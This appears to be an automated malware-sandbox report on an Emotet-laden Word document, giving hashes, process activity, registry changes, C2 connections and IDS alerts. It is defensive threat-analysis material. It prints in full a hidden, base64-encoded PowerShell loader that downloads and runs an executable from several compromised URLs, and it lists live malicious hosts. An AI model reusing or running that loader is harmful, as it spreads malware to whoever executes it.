analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | AE2699RQ59_06_12.doc |
| Full analysis: | https://app.any.run/tasks/340fa4be-690a-412b-b72a-bf4cfa9b8b45 |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | December 06, 2019 at 10:53:19 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Eum ipsa amet., Author: Ela Gtz, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 6 05:50:00 2019, Last Saved Time/Date: Fri Dec 6 05:50:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 334, Security: 0 |
| MD5: | 07C3C25FD8313650CAF5B5EC1732A3EB |
| SHA1: | 0CA358F9DED04299D8011FF7CF3D3C3A9C63D3F5 |
| SHA256: | B8DF9B3F946CC212D02A7822D4A1BE8960B8AAAA7659C87E0A81A932F8389DEF |
| SSDEEP: | 6144:e4B5TXTckkgF72k4StGiL3HJk8yD7bwaaGGk2Us:e4B5TXTckkgF7zQitkH7bwLk2Us |
MALICIOUS
Application was dropped or rewritten from another process
- 798.exe (PID: 3188)
- 798.exe (PID: 292)
- serialfunc.exe (PID: 4032)
- serialfunc.exe (PID: 1160)
Emotet process was detected
- 798.exe (PID: 292)
Downloads executable files from the Internet
- powershell.exe (PID: 2512)
Changes the autorun value in the registry
- serialfunc.exe (PID: 1160)
EMOTET was detected
- serialfunc.exe (PID: 1160)
Connects to CnC server
- serialfunc.exe (PID: 1160)
SUSPICIOUS
PowerShell script executed
- powershell.exe (PID: 2512)
Executed via WMI
- powershell.exe (PID: 2512)
Creates files in the user directory
- powershell.exe (PID: 2512)
Executable content was dropped or overwritten
- powershell.exe (PID: 2512)
- 798.exe (PID: 292)
Application launched itself
- 798.exe (PID: 3188)
Starts itself from another location
- 798.exe (PID: 292)
Connects to server without host name
- serialfunc.exe (PID: 1160)
INFO
Creates files in the user directory
- WINWORD.EXE (PID: 2508)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2508)
Dropped object may contain Bitcoin addresses
- powershell.exe (PID: 2512)
- 798.exe (PID: 292)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (80) |
|---|
EXIF
FlashPix
| Title: | Eum ipsa amet. |
|---|---|
| Subject: | - |
| Author: | Ela Götz |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2019:12:06 05:50:00 |
| ModifyDate: | 2019:12:06 05:50:00 |
| Pages: | 1 |
| Words: | 58 |
| Characters: | 334 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| Lines: | 2 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 391 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 25 |
| CompObjUserType: | Microsoft Forms 2.0 Form |
Total processes
42
Monitored processes
6
Malicious processes
5
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 292 | --6b88d874 | C:\Users\admin\798.exe | 798.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 1160 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | serialfunc.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 2508 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\AE2699RQ59_06_12.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2512 | powershell -w hidden -en JABKAGQAeQB1AGsAawBmAHEAPQAnAE4AYQB5AGEAZgBxAHYAZABhAHAAbgBxACcAOwAkAFkAdAB2AHAAeAB2AHMAdQBxAGgAYwB3ACAAPQAgACcANwA5ADgAJwA7ACQATwB6AGEAYQBvAGgAcQB1AGUAcwBoAHIAawA9ACcAUQBpAHEAZABjAHcAdwBzACcAOwAkAFUAcQB2AGsAbgB0AGkAYwBsAHEAZQB2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABZAHQAdgBwAHgAdgBzAHUAcQBoAGMAdwArACcALgBlAHgAZQAnADsAJABNAHoAdgBqAHEAdABpAHMAeQB3AGsAZQBxAD0AJwBXAGYAdQBpAHgAegBsAHQAdwB6ACcAOwAkAFgAZwBiAGsAagBxAHQAdAB1AG4APQAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AdwBlAEIAYwBMAEkARQBuAFQAOwAkAEEAZwB5AGIAYQB1AGgAYwA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBiAGkAZQB4AHQAZQBuAGQALgBjAG8AbQAvAE4AZQB3AF8AdwBlAGIAcwBpAHQAZQAvAHgALwAqAGgAdAB0AHAAOgAvAC8AZABpAGcAaQB0AGcAZQBuAGkAYwBzAC4AYwBvAG0ALwB1AHMAaQAvAGcALwAqAGgAdAB0AHAAOgAvAC8AYQBsAGwAaQBhAG4AYwBlAGgAbwBtAGUAcABhAGMAawBlAHIAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AYwA1AGYAZgBoAHgALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAGkAZQBuAGUAcwByAGEAaQBjAGUAcwB2AGkAYwB0AG8AcgBpAGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAuAHMAdABvAHAALwBiAEwALwAqAGgAdAB0AHAAcwA6AC8ALwByAG8AeQBhAGwAcQB1AGUAZQBuAG4AeQBjAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB1AG0AawAxAHUAawB2AC8AJwAuACIAUwBgAHAAbABJAFQAIgAoACcAKgAnACkAOwAkAFIAZQB6AHIAaABsAGEAYwA9ACcASwBuAHoAegB6AGwAbgBzAGwAcwBiAHQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoAeQBuAGsAbQBqAHAAdwB0ACAAaQBuACAAJABBAGcAeQBiAGEAdQBoAGMAKQB7AHQAcgB5AHsAJABYAGcAYgBrAGoAcQB0AHQAdQBuAC4AIgBkAE8AVwBuAGAATABPAGEAYABEAGAARgBJAEwARQAiACgAJABaAHkAbgBrAG0AagBwAHcAdAAsACAAJABVAHEAdgBrAG4AdABpAGMAbABxAGUAdgApADsAJABDAGsAcgBhAGEAZwB5AGsAbABzAHIAbwA9ACcARAB0AHAAbQBjAGIAdQBnAGoAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABVAHEAdgBrAG4AdABpAGMAbABxAGUAdgApAC4AIgBMAEUATgBHAGAAVABoACIAIAAtAGcAZQAgADMAOAA2ADAANQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAQQBgAFIAdAAiACgAJABVAHEAdgBrAG4AdABpAGMAbABxAGUAdgApADsAJABGAGQAbwBtAHoAeQB5AGgAcAB4AHUAegBiAD0AJwBaAGMAZwBoAGwAbQBpAHAAcwBjAG8AcQBlACcAOwBiAHIAZQBhAGsAOwAkAEIAdABhAGIAYQB1AHcAeQB0AHQAcAByAD0AJwBZAHAAawBhAGYAdQBlAGMAcQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABYAG8AdwBrAGsAaAB0AGsAdQB3AD0AJwBaAGIAYgBkAGQAbgBvAHYAdgB0AGoAdABtACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3188 | "C:\Users\admin\798.exe" | C:\Users\admin\798.exe | — | powershell.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 4032 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 798.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
Total events
2 269
Read events
1 444
Write events
695
Delete events
130
Modification events
| (PID) Process: | (2508) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | /8c |
Value: 2F386300CC090000010000000000000000000000 | |||
| (PID) Process: | (2508) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2508) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1041 |
Value: Off | |||
| (PID) Process: | (2508) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1046 |
Value: Off | |||
| (PID) Process: | (2508) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1036 |
Value: Off | |||
| (PID) Process: | (2508) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1031 |
Value: Off | |||
| (PID) Process: | (2508) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1040 |
Value: Off | |||
| (PID) Process: | (2508) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1049 |
Value: Off | |||
| (PID) Process: | (2508) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 3082 |
Value: Off | |||
| (PID) Process: | (2508) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1334181950 | |||
Executable files
2
Suspicious files
2
Text files
0
Unknown types
7
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2508 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA88F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2508 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA32DFDA.wmf | — | |
MD5:— | SHA256:— | |||
| 2508 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96103A13.wmf | — | |
MD5:— | SHA256:— | |||
| 2508 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1D184F8.wmf | — | |
MD5:— | SHA256:— | |||
| 2508 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4ED69099.wmf | — | |
MD5:— | SHA256:— | |||
| 2508 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D734DC6.wmf | — | |
MD5:— | SHA256:— | |||
| 2508 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\882DD70F.wmf | — | |
MD5:— | SHA256:— | |||
| 2508 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E7AE5C4.wmf | — | |
MD5:— | SHA256:— | |||
| 2508 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3EDC2F5.wmf | — | |
MD5:— | SHA256:— | |||
| 2508 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B8AD8472.wmf | — | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
10
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1160 | serialfunc.exe | POST | — | 190.56.255.118:80 | http://190.56.255.118/Py1H9T5m | GT | — | — | malicious |
2512 | powershell.exe | GET | 200 | 182.50.135.88:80 | http://www.mobiextend.com/New_website/x/ | SG | executable | 452 Kb | malicious |
1160 | serialfunc.exe | POST | 200 | 139.130.241.252:443 | http://139.130.241.252:443/lz7Q | AU | binary | 148 b | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1160 | serialfunc.exe | 190.56.255.118:80 | — | Telgua | GT | malicious |
2512 | powershell.exe | 182.50.135.88:80 | www.mobiextend.com | GoDaddy.com, LLC | SG | suspicious |
— | — | 139.130.241.252:443 | — | Telstra Pty Ltd | AU | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.mobiextend.com |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
— | — | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
— | — | Misc activity | ET INFO EXE - Served Attached HTTP |
— | — | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5 |
— | — | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6 |
— | — | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
— | — | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
— | — | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5 |
— | — | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6 |
— | — | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |